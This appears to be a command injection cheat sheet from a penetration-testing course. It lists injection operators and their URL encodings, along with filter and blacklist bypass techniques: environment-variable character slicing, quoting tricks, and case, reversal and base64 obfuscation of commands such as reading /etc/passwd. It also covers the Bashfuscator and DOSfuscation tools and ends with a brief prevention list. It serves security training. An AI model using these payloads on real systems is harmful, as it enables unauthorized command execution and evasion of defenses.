Command Injection

Command Injection Methods

Injection Operator	Injection Character	URL-Encoded Character	Executed Command
Semicolon	;	%3b	Both
New Line		%0a	Both
Background	&	%26	Both (second output generally shown first)
Pipe	|	%7c	Both (only second output is shown)
AND	&&	%26%26	Both (only if first succeeds)
OR	||	%7c%7c	Second (only if first fails)
Sub-Shell	``	%60%60	Both (Linux-only)
Sub-Shell	$()	%24%28%29	Both (Linux-only)

---

Other Injection Operators

Injection Type	Operators
SQL Injection	' , ; -- /* */
Command Injection	; &&
LDAP Injection	* ( ) & |
XPath Injection	' or and not substring concat count
OS Command Injection	; & |
Code Injection	' ; -- /* */ $() ${} #{} %{} ^
Directory Traversal/File Path Traversal	../ ..\\ %00
Object Injection	; & |
XQuery Injection	' ; -- /* */
Shellcode Injection	\x \u %u %n
Header Injection	\r %0d %0a %09

Bypass

Space

• %09 (tab)

• ${IFS}

• {ls,-la} Brace expansion

• PayloadsAllTheThings Command Injection bypass-without-space

Other Blacklisted Characters

Linux

$ echo ${PATH:0:1}

/

$ echo ${LS_COLORS:10:1}

;

Windows

C:\htb> echo %HOMEPATH:~6,-11%

\

PS C:\htb> $env:HOMEPATH[0]

\

Character Shifting

$ man ascii     # \ is on 92, before it is [ on 91
$ echo $(tr '!-}' '"-~'<<<[)

\

Blacklisted Commands

Linux & Windows

$ w'h'o'am'i
$ w"h"o"am"i

Linux Only

$ who$@ami
$ w\ho\am\i

Windows Only

C:\htb> who^ami

---

Advance Command Obfuscation

Case Manipulation

PS C:\htb> WhOaMi

$ $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$ $(a="WhOaMi";printf %s "${a,,}")

Reversed Commands

PS C:\htb> iex "$('imaohw'[-1..-20] -join '')"

$ $(rev<<<'imaohw')

Encoded Commands

PS C:\htb> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

$ echo -n 'cat /etc/passwd | grep 33' | base64
$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

More Payloads

PayloadsAllTheThings

---

Evasion Tools

Linux (Bashfuscator)

Installation

$ git clone https://github.com/Bashfuscator/Bashfuscator
$ cd Bashfuscator
$ python3 setup.py install --user

Usage

$ cd ./bashfuscator/bin/
$ ./bashfuscator -h
$ ./bashfuscator -c 'cat /etc/passwd'
$ ./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

Windows (DOSfuscation)

Installation

PS C:\htb> git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
PS C:\htb> cd Invoke-DOSfuscation
PS C:\htb> Import-Module .\Invoke-DOSfuscation.psd1

Usage

PS C:\htb> Invoke-DOSfuscation
Invoke-DOSfuscation> help
Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1

---

Prevention

• Avoid executing system commands

• Input validation on both front-end and back-end

• Input sanitization

• Server configuration

  • use WAF

  • apply principle of least privilege (use www-data for example)

  • open_basedir = '/var/www/html'

  • Reject double-encoded requests and non-ASCII characters in URLs

  • Avoid the use of sensitive/outdated libraries and modules